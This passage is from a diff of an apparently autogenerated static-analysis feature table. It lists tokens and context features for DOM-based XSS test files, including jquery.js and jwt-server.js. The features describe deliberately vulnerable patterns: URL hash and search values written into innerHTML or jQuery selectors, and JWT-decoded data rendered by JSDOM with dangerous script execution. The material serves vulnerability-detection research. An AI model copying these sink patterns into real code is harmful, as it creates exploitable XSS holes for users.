    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:32:12:32:17 | 'blah' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:32:12:32:17 | 'blah' | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:32:12:32:17 | 'blah' | stringConcatenatedWith | hash -endpoint- | +| autogenerated/Xss/DomBasedXss/jquery.js:33:3:33:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:33:3:33:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:33:3:33:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:33:3:33:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:33:3:33:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:33:3:33:18 | $('blah' + hash) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:33:3:33:18 | $('blah' + hash) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:33:3:33:18 | $('blah' + hash) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:33:3:33:18 | $('blah' + hash) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:33:3:33:18 | $('blah' + hash) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:33:3:33:18 | exceptional return of $('blah' + hash) | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:33:3:33:18 | exceptional return of $('blah' + hash) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:33:3:33:18 | exceptional return of $('blah' + hash) | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:33:3:33:18 | exceptional return of $('blah' + hash) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:33:3:33:18 | exceptional return of $('blah' + hash) | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:33:5:33:10 | 'blah' | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:33:5:33:10 | 'blah' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:33:5:33:10 | 'blah' | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:33:5:33:10 | 'blah' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:33:5:33:10 | 'blah' | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:33:5:33:10 | 'blah' | stringConcatenatedWith | -endpoint- hash | | autogenerated/Xss/DomBasedXss/jquery.js:33:5:33:17 | 'blah' + hash | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:33:5:33:17 | 'blah' + hash | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:33:5:33:17 | 'blah' + hash | contextFunctionInterfaces | test() | @@ -14122,12 +103279,38 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:33:5:33:17 | 'blah' + hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:33:5:33:17 | 'blah' + hash | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:33:5:33:17 | 'blah' + hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:33:14:33:17 | hash | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:33:14:33:17 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:33:14:33:17 | hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:33:14:33:17 | hash | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:33:14:33:17 | hash | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:33:14:33:17 | hash | stringConcatenatedWith | 'blah' -endpoint- | +| autogenerated/Xss/DomBasedXss/jquery.js:34:3:34:3 | $ | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:34:3:34:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:34:3:34:3 | $ | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:34:3:34:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:34:3:34:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:34:3:34:26 | $('' ... '') | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:34:3:34:26 | $('' ... '') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:34:3:34:26 | $('' ... '') | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:34:3:34:26 | $('' ... '') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:34:3:34:26 | $('' ... '') | fileImports | | +| autogenerated/Xss/DomBasedXss/jquery.js:34:3:34:26 | exceptional return of $('' ... '') | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:34:3:34:26 | exceptional return of $('' ... '') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jquery.js:34:3:34:26 | exceptional return of $('' ... '') | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:34:3:34:26 | exceptional return of $('' ... '') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:34:3:34:26 | exceptional return of $('' ... '') | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:34:5:34:9 | '' | contextFunctionInterfaces | test() | | autogenerated/Xss/DomBasedXss/jquery.js:34:5:34:9 | '' | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/jquery.js:34:5:34:9 | '' | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | | autogenerated/Xss/DomBasedXss/jquery.js:34:5:34:9 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:34:5:34:9 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:34:5:34:9 | '' | stringConcatenatedWith | -endpoint- hash + '' | +| autogenerated/Xss/DomBasedXss/jquery.js:34:5:34:16 | '' + hash | contextFunctionInterfaces | test() | +| autogenerated/Xss/DomBasedXss/jquery.js:34:5:34:16 | '' + hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/jquery.js:34:5:34:16 | '' + hash | enclosingFunctionBody | tainted document location search $ tainted $ body tainted $ . tainted $
    $ body html XSS: tainted $ window location hash $ location toString elm document getElementById x elm innerHTML decodeURIComponent window location hash elm innerHTML decodeURIComponent window location search elm innerHTML decodeURIComponent window location toString hash window location hash $ hash $ hash substring 1 $ hash substring 1 10 $ hash substr 1 $ hash slice 1 $ hash substring 0 10 $ hash replace # $ window location search replace ? $ hash replace ! $ hash replace blah $ hash blah $ blah hash $ hash | +| autogenerated/Xss/DomBasedXss/jquery.js:34:5:34:16 | '' + hash | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/jquery.js:34:5:34:16 | '' + hash | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:34:5:34:25 | '' + ... '' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/jquery.js:34:5:34:25 | '' + ... '' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jquery.js:34:5:34:25 | '' + ... '' | contextFunctionInterfaces | test() | @@ -14147,12 +103330,110 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jquery.js:34:20:34:25 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/jquery.js:34:20:34:25 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/jquery.js:34:20:34:25 | '' | stringConcatenatedWith | '' + hash -endpoint- | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:1:1:0 | this | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:1:1:1 | JSDOM | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:1:1:1 | JSDOM | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:1:1:1 | JSDOM | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:1:1:1 | jwt | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:1:1:1 | jwt | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:1:1:1 | jwt | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:1:1:1 | require | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:5:1:11 | express | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:5:1:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:5:1:11 | express | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:5:1:32 | express | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:5:1:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:5:1:32 | express | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:5:1:32 | express ... press') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:5:1:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:5:1:32 | express ... press') | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:15:1:21 | require | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:15:1:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:15:1:21 | require | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:15:1:32 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:15:1:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:15:1:32 | exceptional return of require('express') | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:15:1:32 | require('express') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:15:1:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:1:15:1:32 | require('express') | fileImports | express jsdom jsonwebtoken | | autogenerated/Xss/DomBasedXss/jwt-server.js:1:23:1:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/DomBasedXss/jwt-server.js:1:23:1:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jwt-server.js:1:23:1:31 | 'express' | calleeImports | | | autogenerated/Xss/DomBasedXss/jwt-server.js:1:23:1:31 | 'express' | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/jwt-server.js:1:23:1:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/jwt-server.js:1:23:1:31 | 'express' | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:2:5:2:7 | app | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:2:5:2:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:2:5:2:7 | app | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:2:5:2:19 | app | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:2:5:2:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:2:5:2:19 | app | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:2:5:2:19 | app = express() | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:2:5:2:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:2:5:2:19 | app = express() | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:2:11:2:17 | express | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:2:11:2:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:2:11:2:17 | express | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:2:11:2:19 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:2:11:2:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:2:11:2:19 | exceptional return of express() | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:2:11:2:19 | express() | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:2:11:2:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:2:11:2:19 | express() | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:3:1:3:31 | import ... token"; | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:3:1:3:31 | import ... token"; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:3:1:3:31 | import ... token"; | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:3:8:3:10 | jwt | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:3:8:3:10 | jwt | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:3:8:3:10 | jwt | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:3:8:3:10 | jwt | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:3:8:3:10 | jwt | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:3:8:3:10 | jwt | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:3:8:3:10 | jwt | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:3:8:3:10 | jwt | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:3:8:3:10 | jwt | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:3:8:3:10 | jwt | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:3:17:3:30 | "jsonwebtoken" | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:3:17:3:30 | "jsonwebtoken" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:3:17:3:30 | "jsonwebtoken" | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:1:5:30 | import ... jsdom"; | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:1:5:30 | import ... jsdom"; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:1:5:30 | import ... jsdom"; | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:10:5:14 | JSDOM | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:10:5:14 | JSDOM | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:10:5:14 | JSDOM | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:10:5:14 | JSDOM | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:10:5:14 | JSDOM | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:10:5:14 | JSDOM | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:10:5:14 | JSDOM | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:10:5:14 | JSDOM | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:10:5:14 | JSDOM | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:10:5:14 | JSDOM | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:10:5:14 | JSDOM | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:10:5:14 | JSDOM | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:10:5:14 | JSDOM | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:23:5:29 | "jsdom" | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:23:5:29 | "jsdom" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:5:23:5:29 | "jsdom" | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:1:6:3 | app | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:1:6:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:1:6:3 | app | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:1:6:7 | app.get | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:1:6:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:1:6:7 | app.get | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:1:13:2 | app.get ... });\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:1:13:2 | app.get ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:1:13:2 | app.get ... });\\n}) | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:1:13:2 | exceptional return of app.get ... });\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:1:13:2 | exceptional return of app.get ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:1:13:2 | exceptional return of app.get ... });\\n}) | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:5:6:7 | get | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:5:6:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:5:6:7 | get | fileImports | express jsdom jsonwebtoken | | autogenerated/Xss/DomBasedXss/jwt-server.js:6:9:6:20 | '/some/path' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/DomBasedXss/jwt-server.js:6:9:6:20 | '/some/path' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/jwt-server.js:6:9:6:20 | '/some/path' | calleeImports | express | @@ -14160,6 +103441,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jwt-server.js:6:9:6:20 | '/some/path' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/jwt-server.js:6:9:6:20 | '/some/path' | fileImports | express jsdom jsonwebtoken | | autogenerated/Xss/DomBasedXss/jwt-server.js:6:9:6:20 | '/some/path' | receiverName | app | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:6:22 | jwt | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:6:22 | jwt | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:6:22 | jwt | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:6:22 | jwt | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:6:22 | jwt | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:6:22 | this | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:6:22 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:6:22 | this | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:6:22 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:6:22 | this | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | 'arguments' object of anonymous function | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | exceptional return of anonymous function | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | exceptional return of anonymous function | fileImports | express jsdom jsonwebtoken | | autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | functio ... });\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | functio ... });\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | functio ... });\\n} | calleeImports | express | @@ -14167,6 +103468,66 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | functio ... });\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | functio ... });\\n} | fileImports | express jsdom jsonwebtoken | | autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | functio ... });\\n} | receiverName | app | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | return of anonymous function | enclosingFunctionBody | req res taint req param wobble jwt verify taint my-secret-key err decoded JSDOM decoded foo runScripts dangerously | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:23:13:1 | return of anonymous function | fileImports | express jsdom jsonwebtoken | +| autogenerated/Xss/DomBasedXss/jwt-server.js:6:33:6:35 | req | contextFunctionInterfaces | | +| 